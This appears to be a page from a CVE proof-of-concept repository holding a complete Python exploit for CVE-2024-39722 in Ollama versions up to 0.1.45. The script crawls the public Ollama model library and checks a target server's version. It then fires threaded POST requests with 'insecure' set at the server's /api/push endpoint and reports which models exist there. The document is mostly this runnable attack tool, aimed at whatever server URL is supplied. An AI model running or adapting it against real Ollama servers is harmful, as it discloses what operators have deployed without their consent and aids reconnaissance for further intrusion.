4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE_2024_39722.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import sys
import json
import requests
from lxml import etree
import argparse
from termcolor import colored
import threading
import queue
from threading import Lock
from urllib.parse import urlparse

def print_banner():
    """Print exploit banner"""
    banner = """
    ┌─────────────────────────────────────────────────────┐
    │  Ollama CVE-2024-39722 Model Existence Disclosure   │
    │  Exploit for Ollama versions <= 0.1.45              │
    │                                                     │
    │  CVSS Score: 7.5                                    │
    └─────────────────────────────────────────────────────┘
    """
    print(colored(banner, "cyan"))

def get_html_content(url, cache_file="response.html"):
    """
    Retrieves HTML content from URL or cache
    
    Args:
        url (str): URL to retrieve
        cache_file (str): Cache file name
        
    Returns:
        tuple: (etree object, status information)
    """
    if os.path.exists(cache_file):
        print(colored(f"[INFO] File {cache_file} already exists!", "green"))
        return etree.parse(cache_file, etree.HTMLParser()), "cached"
    else:
        try:
            res = requests.get(url)
            if res.status_code == 200:
                print(colored("[INFO] Get html source success!", "green"))
                with open(cache_file, "w", encoding="utf-8") as f:
                    f.write(res.text)
                print(colored(f"[INFO] Write html source to file {cache_file} success!", "green"))
                return etree.HTML(res.text), "fetched"
            else:
                print(colored(f"[ERROR] Get html source failed! Status code: {res.status_code}", "red"))
                return None, "error"
        except Exception as e:
            print(colored(f"[ERROR] Exception occurred: {str(e)}", "red"))
            return None, "error"

def extract_model_links(html, base_url):
    """
    Extracts model links from HTML
    
    Args:
        html: etree HTML object
        base_url (str): Base URL
        
    Returns:
        list: List of model information
    """
    links = html.xpath('//*[@id="repo"]/ul/li')
    infos = []
    for i in range(len(links)):
        url = links[i].xpath('./a/@href')[0]
        name = url.split("/")[-1]
        tags = links[i].xpath('./a/div[2]/div/span[@x-test-size]/text()')
        infos.append({
            "name": name,
            "url": base_url + url,
            "tags": tags
        })
    return infos

def crawl_ollama_models(url="https://ollama.com/library", base_url="https://ollama.com", 
                       cache_file="response.html", output_file="links.json"):
    """
    Crawls Ollama model library
    
    Args:
        url (str): Model library URL
        base_url (str): Base URL
        cache_file (str): HTML cache file
        output_file (str): Output JSON file
        
    Returns:
        list: List of model information
    """
    print(colored("[*] Crawling Ollama models...", "yellow"))
    html, status = get_html_content(url, cache_file)
    if status == "error":
        return []
        
    infos = extract_model_links(html, base_url)
    
    for i, info in enumerate(infos):
        print(colored(f"[INFO] Get link {i+1}: {info}", "green"))
    print(colored(f"[INFO] Get all {len(infos)} links success!", "green"))
    
    # save links to json file
    with open(output_file, "w", encoding="utf-8") as f:
        json.dump(infos, f, ensure_ascii=False, indent=4)
    
    print(colored(f"[+] Models saved to {output_file}", "green"))
    return infos

def format_url(url):
    """
    Ensure URL is properly formatted (no trailing slashes)
    
    Args:
        url (str): URL to format
        
    Returns:
        str: Properly formatted URL
    """
    # Ensure URL starts with http/https
    if not url.startswith('http'):
        url = 'http://' + url
        
    # Remove trailing slash if present
    if url.endswith('/'):
        url = url[:-1]
        
    return url

def check_ollama_version(base_url):
    """
    Check Ollama version to determine if it's vulnerable to CVE-2024-39722
    
    Args:
        base_url (str): Base URL of Ollama server
        
    Returns:
        tuple: (is_vulnerable, version_str or None, error_message or None)
    """
    try:
        # Format URL and construct version endpoint URL
        base_url = format_url(base_url)
        version_url = f"{base_url}/api/version"
        
        # Send request to version endpoint
        response = requests.get(version_url, timeout=5)
        
        if response.status_code == 200:
            # Parse version from response
            data = response.json()
            if "version" in data:
                version = data["version"]
                # Check if version is vulnerable (≤ 0.1.45)
                is_vulnerable = is_version_vulnerable(version)
                
                if is_vulnerable:
                    return True, version, None
                else:
                    return False, version, f"Ollama version {version} is not vulnerable to CVE-2024-39722 (requires version ≤ 0.1.45)"
            else:
                return False, None, "Version information not found in response"
        else:
            return False, None, f"Failed to get version, server returned status code: {response.status_code}"
            
    except requests.exceptions.RequestException as e:
        return False, None, f"Connection error: {str(e)}"
    except Exception as e:
        return False, None, f"Error checking Ollama version: {str(e)}"

def is_version_vulnerable(version):
    """
    Check if the given version is vulnerable to CVE-2024-39722 (≤ 0.1.45)
    
    Args:
        version (str): Version string (e.g., "0.1.44")
        
    Returns:
        bool: True if version is vulnerable, False otherwise
    """
    try:
        # Parse version components
        components = version.split('.')
        major, minor, patch = map(int, components)
        
        # Check if version is <= 0.1.45
        if major == 0 and minor == 1 and patch <= 45:
            return True
        elif major == 0 and minor < 1:
            return True
        else:
            return False
    except (ValueError, IndexError):
        # If version parsing fails, assume vulnerable to be safe
        print(colored(f"[WARNING] Could not parse version string: {version}", "yellow"))
        return True

def send_api_request(url, payload):
    """
    Sends API request to Ollama server
    
    Args:
        url (str): Target URL
        payload (dict): JSON payload
        
    Returns:
        str: Response content or None (if error)
    """
    # Send POST request
    try:
        response = requests.post(url, json=payload)
        return response.text
    except requests.exceptions.RequestException as e:
        print(colored(f"[ERROR] Request exception: {e}", "red"))
        return None

def worker(task_queue, url, leaked_models, print_lock):
    """
    Worker function for threading
    
    Args:
        task_queue: Queue with payloads to process
        url: Target URL
        leaked_models: Shared list to store leaked models
        print_lock: Lock for thread-safe printing
    """
    while not task_queue.empty():
        try:
            i, payload = task_queue.get(block=False)
            
            with print_lock:
                print(colored(f"[*] Testing payload {i+1}: {payload['name']}", "yellow"))
            
            result = send_api_request(url=url, payload=payload)
            
            if result and "error" not in result:
                with print_lock:
                    print(colored(f"[+] Ollama server model leak: {payload['name']}", "green"))
                    print(colored(f"[+] Payload: '{json.dumps(payload)}'", "green"))
                leaked_models.append(payload['name'])
                
            task_queue.task_done()
        except queue.Empty:
            break

def exploit_ollama_server(url="http://localhost:11434/api/push", links_file="links.json", thread_count=10):
    """
    Exploits Ollama server by attempting to leak models using payloads from a JSON file
    
    Args:
        url (str): The URL of the Ollama server API
        links_file (str): Path to the JSON file containing links data
        thread_count (int): Number of threads to use for payload testing
    
    Returns:
        list: List of leaked model names
    """
    print(colored("[*] Starting Ollama server exploitation...", "yellow"))
    
    # Format URL properly
    url = format_url(url)
    
    # Get base URL for version checking
    parsed_url = urlparse(url)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
    
    # Check if server is vulnerable based on version
    is_vulnerable, version, error = check_ollama_version(base_url)
    
    if not is_vulnerable:
        if version:
            print(colored(f"[!] Target server is not vulnerable: Ollama v{version}", "yellow"))
        if error:
            print(colored(f"[!] {error}", "yellow"))
        return []
    else:
        if version:
            print(colored(f"[+] Target server is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))
    
    try:
        with open(links_file, 'r') as f:
            data = json.load(f)
            print(colored(f"[INFO] Read {len(data)} links from file {f.name} success!", "green"))
    except Exception as e:
        print(colored(f"[ERROR] Failed to read links file: {str(e)}", "red"))
        return []

    payloads = []
    leaked_models = []
    print_lock = Lock()

    # Create payloads from model data
    for i in range(len(data)):
        for j in range(len(data[i]['tags'])):
            payloads.append({
                "name": data[i]['name']+":"+data[i]['tags'][j],
                "insecure": True,
                "stream": True,
            })
    
    print(colored(f"[INFO] Generated {len(payloads)} payloads for testing", "green"))
    print(colored(f"[INFO] Using {thread_count} threads for payload testing", "green"))

    # Create a queue and add payloads with their indices
    task_queue = queue.Queue()
    for i, payload in enumerate(payloads):
        task_queue.put((i, payload))
    
    # Create and start worker threads
    threads = []
    for _ in range(min(thread_count, len(payloads))):
        thread = threading.Thread(
            target=worker,
            args=(task_queue, url, leaked_models, print_lock)
        )
        thread.daemon = True
        thread.start()
        threads.append(thread)
    
    # Wait for all threads to complete
    for thread in threads:
        thread.join()
    
    if leaked_models:
        print(colored(f"[+] Successfully leaked {len(leaked_models)} models", "green"))
    else:
        print(colored("[-] No models leaked", "yellow"))
    
    return leaked_models

def main():
    """Main function"""
    parser = argparse.ArgumentParser(description="Ollama CVE-2024-39722 Exploit Tool")
    parser.add_argument("-u", "--url",
                        help="Target Ollama server URL")
    parser.add_argument("-c", "--crawl", action="store_true", 
                        help="Crawl Ollama models library")
    parser.add_argument("-o", "--output", default="results.json", 
                        help="Output file for results (default: results.json)")
    parser.add_argument("-t", "--threads", type=int, default=10,
                        help="Number of threads to use (default: 10)")
    parser.add_argument("-v", "--version-check", action="store_true",
                        help="Only check if target is vulnerable based on version")
    
    args = parser.parse_args()
    
    print_banner()
    
    # No arguments provided, show help
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    
    results = {}
    
    # Crawl Ollama models
    if args.crawl:
        results["crawled_models"] = crawl_ollama_models()
    
    # Check version only
    if args.version_check and args.url:
        url = format_url(args.url)
        is_vulnerable, version, error = check_ollama_version(url)
        if is_vulnerable:
            print(colored(f"[+] Target is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))
        else:
            if version:
                print(colored(f"[-] Target is not vulnerable: Ollama v{version}", "red"))
            if error:
                print(colored(f"[!] {error}", "yellow"))
        return
    
    # Exploit Ollama server
    if args.url:
        url = format_url(args.url)
        # Make sure URL ends with /api/push for exploitation
        if not url.endswith("/api/push"):
            url = f"{url}/api/push"
        results["leaked_models"] = exploit_ollama_server(url=url, thread_count=args.threads)
    
    # Save results to file
    if results:
        with open(args.output, "w") as f:
            json.dump(results, f, indent=4)
        print(colored(f"[+] Results saved to {args.output}", "green"))

if __name__ == "__main__":
    main()